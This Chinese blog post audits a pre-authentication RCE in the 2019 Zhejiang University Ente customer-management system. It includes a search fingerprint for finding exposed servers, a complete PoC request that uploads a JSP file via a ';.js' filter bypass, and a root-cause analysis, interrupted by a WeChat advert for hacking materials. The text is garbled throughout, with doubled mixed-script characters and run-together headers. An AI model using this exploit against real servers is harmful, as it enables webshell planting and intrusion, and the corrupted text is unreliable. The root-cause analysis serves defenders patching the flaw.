浙大恩特前臺RCE漏洞審計

浙大恩特客戶資源管理系統(tǒng)2019版本存在權限繞過加文件上傳組合漏洞，可通過上傳webshell實現(xiàn)前臺RCE。本文對該系統(tǒng)公開在互聯(lián)網(wǎng)，但未分析代碼細節(jié)的漏洞進行審計分析。

指紋：title="歡迎使用浙大恩特客戶資源管理系統(tǒng)"

本文對該系統(tǒng)公開在互聯(lián)網(wǎng)，但未分析代碼細節(jié)的漏洞進行審計分析：

前臺文件上傳RCE

該系統(tǒng)2019版本存在權限繞過加文件上傳組合漏洞，可通過上傳webshell實現(xiàn)前臺RCE。

公開POC：

POST /entsoft/CustomerAction.entphone;.js?method=loadFile HTTP/1.1Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0)
Gecko/20100101 Firefox/112.0 uacqAccept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language:
zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding:
gzip, deflateConnection: closeContent-Type: multipart/form-data;
boundary=----WebKitFormBoundarye8FPHsIAq9JN8j2AContent-Length: 203
?
------WebKitFormBoundarye8FPHsIAq9JN8j2AContent-Disposition:
form-data; name="file";filename="as.jsp"Content-Type: image/jpeg
?
<%out.print("test");%>------WebKitFormBoundarye8FPHsIAq9JN8j2A--

權限繞過部分先看過濾器：

分析web.xml發(fā)現(xiàn)purfilter為全局過濾器：

如上，會對/*也就是任意請求進行攔截，跟進源碼：

首先出現(xiàn)的就是白名單后綴+白名單接口，在后續(xù)校驗中也是對非listExpUrl內(nèi)容的后綴或者接口才會進行權限校驗：

而攔截器在進行后綴白名單檢測時，獲取后綴的方式如下：

通過獲取最后一個.的部分作為后綴。

【----幫助網(wǎng)安學習，以下所有學習資料免費領！加vx：YJ-2021-1，備注 “博客園” 獲取！】

　① 網(wǎng)安學習成長路徑思維導圖
　② 60+網(wǎng)安經(jīng)典常用工具包
　③ 100+SRC漏洞分析報告
　④ 150+網(wǎng)安攻防實戰(zhàn)技術電子書
　⑤ 最權威CISSP 認證考試指南+題庫
　⑥ 超1800頁CTF實戰(zhàn)技巧手冊
　⑦ 最新網(wǎng)安大廠面試題合集（含答案）
　⑧ APP客戶端安全檢測指南（安卓+IOS）

而且該系統(tǒng)是tomcat容器，基于該容器對;的解析特性，不會匹配到;后面的內(nèi)容，也就是在進行路由匹配時，只會匹配到CustomerAction.entphone，從而使得CustomerAction.entphone;.js?method=loadFile順利進入過濾器層面的校驗，并且此時獲取的后綴又是.js，處于白名單后綴，從而實現(xiàn)權限繞過。